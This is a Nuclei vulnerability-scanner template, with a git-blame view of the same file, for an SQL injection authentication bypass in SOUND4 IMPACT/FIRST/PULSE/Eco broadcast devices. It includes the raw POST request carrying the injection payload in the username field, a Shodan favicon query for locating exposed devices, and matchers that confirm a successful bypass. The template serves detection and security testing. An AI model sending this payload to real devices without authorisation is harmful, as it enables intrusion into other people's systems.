nuclei-templates/http/vulnerabilities/other/sound4-impact-auth-bypass.yaml

id: sound4-impact-auth-bypass

info:
  name: SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass
  author: r3Y3r53
  severity: high
  description: |
    The application suffers from an SQL Injection vulnerability. Input passed through the 'username' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1548359600
  tags: sqli,zeroscience,sound4,auth-bypass

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=%27%2Bjoxvy--%2Bz&password=ffesdf

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Network Diagnostic:", "disconnect the user")'
        condition: and

# digest: 490a0046304402203414ec95873f2b5faeba774f452f333196bc6f8699cf83b65a6b31c190365d35022004bbd019fbbe2cec3cfffa033c2d056165de82abe719e7e9d05ae57f50701a4f:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: sound4-impact-auth-bypass`

			`info:`
			`name: SOUND4 IMPACT/FIRST/PULSE/Eco <= 2.x - Authentication Bypass`
			`author: r3Y3r53`
			`severity: high`
			`description: \|`
			`The application suffers from an SQL Injection vulnerability. Input passed through the 'username' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.`
			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php`
			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 1`
templates added 2023-10-17 07:20:28 +00:00			`shodan-query: http.favicon.hash:-1548359600`
			`tags: sqli,zeroscience,sound4,auth-bypass`

			`http:`
			`- raw:`
			`- \|`
			`POST /index.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`username=%27%2Bjoxvy--%2Bz&password=ffesdf`

			`redirects: true`
			`max-redirects: 2`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
			`- 'contains_all(body, "Network Diagnostic:", "disconnect the user")'`
			`condition: and`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00
			`# digest: 490a0046304402203414ec95873f2b5faeba774f452f333196bc6f8699cf83b65a6b31c190365d35022004bbd019fbbe2cec3cfffa033c2d056165de82abe719e7e9d05ae57f50701a4f:922c64590222798bb761d5b6d8e72950`